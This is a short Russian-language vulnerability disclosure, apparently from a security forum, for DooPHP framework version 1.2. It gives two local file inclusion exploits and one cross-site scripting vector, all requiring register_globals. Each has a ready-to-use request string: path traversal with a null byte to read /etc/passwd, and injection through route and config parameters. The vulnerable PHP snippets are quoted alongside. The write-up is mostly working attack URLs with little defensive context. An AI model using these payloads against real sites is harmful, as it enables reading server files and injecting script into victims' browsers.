Сайт: http://www.doophp.com/ Версия: 1.2 LFI Необходимо: register_globals = On Code: index.php/xek/?route[*][%2Fxek][]=../../../../../../../../etc/passwd%00&route[*][%2Fxek][]=index Файл: ./protected/config/routes.conf.php PHP: <?php /** * Define your URI routes here. * * $route[Request Method][Uri] = array( Controller class, action method, other options, etc. ) * * RESTful api support, *=any request method, GET PUT POST DELETE * POST Create * GET Read * PUT Update, Create * DELETE Delete * * Use lowercase for Request Method * * If you have your controller file name different from its class name, eg. home.php HomeController * $route['*']['/'] = array('HomeController', 'index', 'className'=>'HomeController'); * * If you need to reverse generate URL based on route ID with DooUrlBuilder in template view, please defined the id along with the routes * $route['*']['/'] = array('HomeController', 'index', 'id'=>'home'); */ $admin = array('admin'=>'1234'); $route['*']['/'] = array('MainController', 'index'); ... LFI Необходимо: register_globals = On Неинициализированный индекс $config['ERROR_404_DOCUMENT'] (по дефолту строка закомментированна) Code: index.php/xek/?config[ERROR_404_DOCUMENT]=../../../../../../etc/passwd Файл: dooframework/app/DooWebApp.php PHP: ... if($code===404){ //Controller return 404, send 404 header, include file if ERROR_404_DOCUMENT is set by user header('HTTP/1.1 404 Not Found'); if(!empty(Doo::conf()->ERROR_404_DOCUMENT)){ include Doo::conf()->SITE_PATH . Doo::conf()->ERROR_404_DOCUMENT; } //execute route to handler 404 display if ERROR_404_ROUTE is defined, the route handler shouldn't send any headers or return 404 elseif(!empty(Doo::conf()->ERROR_404_ROUTE)){ $this->reroute(Doo::conf()->ERROR_404_ROUTE, true); } exit; } ... XSS Необходимо: register_globals = On Code: /protected/viewc/good.php?data[asd]=[xss payload] Файл: protected/viewc/good.php PHP: <?php echo $data['asd']; echo $this->gogo; $this->inc('abc'); ?>
